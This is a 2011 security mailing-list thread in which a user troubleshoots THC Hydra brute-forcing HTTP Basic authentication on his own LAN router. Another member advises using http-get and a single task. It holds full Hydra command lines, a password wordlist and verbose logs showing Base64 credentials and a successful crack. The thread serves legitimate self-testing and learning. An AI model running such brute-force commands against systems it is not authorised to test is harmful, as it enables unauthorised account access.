Security Basics mailing list archives
Re: THC Hydra and HTTP brute-force cracking
From: Martin T <m4rtntns () gmail com>
Date: Fri, 1 Apr 2011 15:23:36 +0300
Jérôme, thanks! "hydra -s 8080 -l admin -p pA55w0Rd -f -v -t 1 192.168.1.1 http-get /" did the thing! Example below: <<<<< [root@ ~]# cat /root/words.txt password pA55w0Rd user pA55w0Rd Admin Administrator [root@ ~]# hydra -s 8080 -l admin -P /root/words.txt -t 1 -f -v 192.168.1.1 http-get / Hydra v6.1 (c) 2011 by van Hauser / THC - use allowed only for legal purposes. Hydra (http://www.thc.org) starting at 2011-04-01 15:08:44 [DATA] 1 tasks, 1 servers, 6 login tries (l:1/p:6), ~6 tries per task [DATA] attacking service http-get on port 8080 [VERBOSE] Resolving addresses ... done C1:GET / HTTP/1.0 Host: 192.168.1.1 Authorization: Basic YWRtaW46cGFzc3dvcmQ= User-Agent: Mozilla/4.0 (Hydra) S:HTTP/1.0 401 Unauthorized Server: httpd Date: Fri, 01 Apr 2011 15:11:11 GMT WWW-Authenticate: Basic realm="WRT54G" Content-Type: text/html Connection: close <HTML><HEAD><TITLE>401 Unauthorized</TITLE></HEAD> <BODY BGCOLOR="#cc9999"><H4>401 Unauthorized</H4> Authorization required. </BODY></HTML> C1:GET / HTTP/1.0 Host: 192.168.1.1 Authorization: Basic YWRtaW46azR0ZWtT User-Agent: Mozilla/4.0 (Hydra) S:HTTP/1.0 200 Ok Server: httpd Date: Fri, 01 Apr 2011 15:11:11 GMT Cache-Control: no-cache Pragma: no-cache Expires: 0 Content-Type: text/html Connection: close <!-- ********************************************************* * Copyright 2003, Cy [8080][www] host: 192.168.1.1 login: admin password: pA55w0Rd [STATUS] attack finished for 192.168.1.1 (valid pair found) Hydra (http://www.thc.org) finished at 2011-04-01 15:08:45 [root@ ~]#
When should one use http-head? In addition, I have read many people complaining(mainly in backtrack-linux.org/forums) about "-t" feature in hydra as it runs by default 16 parallel tasks simultaneously and may skip passwords in password file.. Jérôme mentiod this as well. Is there a fix for this or is it a hydra bug at all? regarding, martin 2011/3/31 Jérôme Nokin <jerome () wallaby be>:
Hi Martin, Why are you using http-head instead of http-get ? Your browser is actually doing "GET / HTTP/1.0", not "HEAD / HTTP/1.0" Jérôme On 31/03/11 09:34, Martin T wrote:Jérôme, I tried with "-t 1", but it did not help. Finally I tried with such command: [root@ ~]# hydra -s 8080 -l admin -p pA55w0Rd -f -v -t 1 192.168.1.1 http-head / Hydra v6.1 (c) 2011 by van Hauser / THC - use allowed only for legal purposes. Hydra (http://www.thc.org) starting at 2011-03-31 10:20:39 [DATA] 1 tasks, 1 servers, 1 login tries (l:1/p:1), ~1 tries per task [DATA] attacking service http-head on port 8080 [VERBOSE] Resolving addresses ... done [STATUS] attack finished for 192.168.1.1 (waiting for children to finish) C1:HEAD / HTTP/1.0 Host: 192.168.1.1 Authorization: Basic YWRtaW46azR0ZWtT User-Agent: Mozilla/4.0 (Hydra) Hydra (http://www.thc.org) finished at 2011-03-31 10:20:39 [root@ ~]# ..and still no success. If I enter "admin" to the "User Name: " box and "pA55w0Rd" to the "Password: " box in my web browser, I'm able to log in. What might be wrong? Thanks for all the suggestions, I'll check Mezcal and NiX. In addition, any experience with ncrack(http://nmap.org/ncrack/man.html) in case of HTTP(S) brute-force cracking? regards, martin 2011/3/30 Jérôme Nokin <jerome () wallaby be>:Hi Martin, Sometime I get this problem when I use multiple parallel tasks. (by default 16) Try with only one (-t 1) to see. Cheers, Jérôme On 29/03/11 12:47, Martin T wrote:I set up an ASUS WL-500gP with original ASUS firmware to my LAN with IP address 192.168.1.1. If I navigate to address http://192.168.1.1:8080/ in my Firefox address bar, an "Authentication required" window opens up asking for "User name: " and "Password: ". Correct "User name: " is "admin" and correct "Password: " is "pA55w0Rd". They work fine if I type them in manually to the "Authentication required" window, but for some reason I can't get in using the hydra with words.txt password file, which contains "pA55w0Rd": [root@ ~]# cat words.txt password user pA55w0Rd Admin Administrator [root@ ~]# hydra -s 8080 -l admin -v -P words.txt -e ns -f 192.168.1.1 http-head / [VERBOSE] More tasks defined than login/pass pairs exist. Tasks reduced to 7. Hydra v6.1 (c) 2011 by van Hauser / THC - use allowed only for legal purposes. Hydra (http://www.thc.org) starting at 2011-03-29 13:12:11 [DATA] 7 tasks, 1 servers, 7 login tries (l:1/p:7), ~1 tries per task [DATA] attacking service http-head on port 8080 [VERBOSE] Resolving addresses ... done [STATUS] attack finished for 192.168.1.1 (waiting for children to finish) C1:HEAD / HTTP/1.0 Host: 192.168.1.1 Authorization: Basic YWRtaW46 User-Agent: Mozilla/4.0 (Hydra) C1:HEAD / HTTP/1.0 Host: 192.168.1.1 Authorization: Basic YWRtaW46YWRtaW4= User-Agent: Mozilla/4.0 (Hydra) C1:HEAD / HTTP/1.0 Host: 192.168.1.1 Authorization: Basic YWRtaW46cGFzc3dvcmQ= User-Agent: Mozilla/4.0 (Hydra) C1:HEAD / HTTP/1.0 Host: 192.168.1.1 Authorization: Basic YWRtaW46dXNlcg== User-Agent: Mozilla/4.0 (Hydra) C1:HEAD / HTTP/1.0 Host: 192.168.1.1 Authorization: Basic YWRtaW46cEE1NXcwUmQ= User-Agent: Mozilla/4.0 (Hydra) C1:HEAD / HTTP/1.0 Host: 192.168.1.1 Authorization: Basic YWRtaW46QWRtaW4= User-Agent: Mozilla/4.0 (Hydra) C1:HEAD / HTTP/1.0 Host: 192.168.1.1 Authorization: Basic YWRtaW46QWRtaW5pc3RyYXRvcg== User-Agent: Mozilla/4.0 (Hydra) Hydra (http://www.thc.org) finished at 2011-03-29 13:12:12 [root@ ~]# What might cause this? If any additional information is needed, please ask! regards, Martin ------------------------------------------------------------------------ Securing Apache Web Server with thawte Digital Certificate In this guide we examine the importance of Apache-SSL and who needs an SSL certificate. We look at how SSL works, how it benefits your company and how your customers can tell if a site is secure. You will find out how to test, purchase, install and use a thawte Digital Certificate on your Apache web server. Throughout, best practices for set-up are highlighted to help you ensure efficient ongoing management of your encryption keys and digital certificates. http://www.dinclinx.com/Redirect.aspx?36;4175;25;1371;0;5;946;e13b6be442f727d1 ------------------------------------------------------------------------
------------------------------------------------------------------------ Securing Apache Web Server with thawte Digital Certificate In this guide we examine the importance of Apache-SSL and who needs an SSL certificate. We look at how SSL works, how it benefits your company and how your customers can tell if a site is secure. You will find out how to test, purchase, install and use a thawte Digital Certificate on your Apache web server. Throughout, best practices for set-up are highlighted to help you ensure efficient ongoing management of your encryption keys and digital certificates. http://www.dinclinx.com/Redirect.aspx?36;4175;25;1371;0;5;946;e13b6be442f727d1 ------------------------------------------------------------------------
Current thread:
- Re: THC Hydra and HTTP brute-force cracking Martin T (Apr 01)
- Re: THC Hydra and HTTP brute-force cracking David Maciejak (Apr 01)
- Message not available
- Re: THC Hydra and HTTP brute-force cracking Martin T (Apr 05)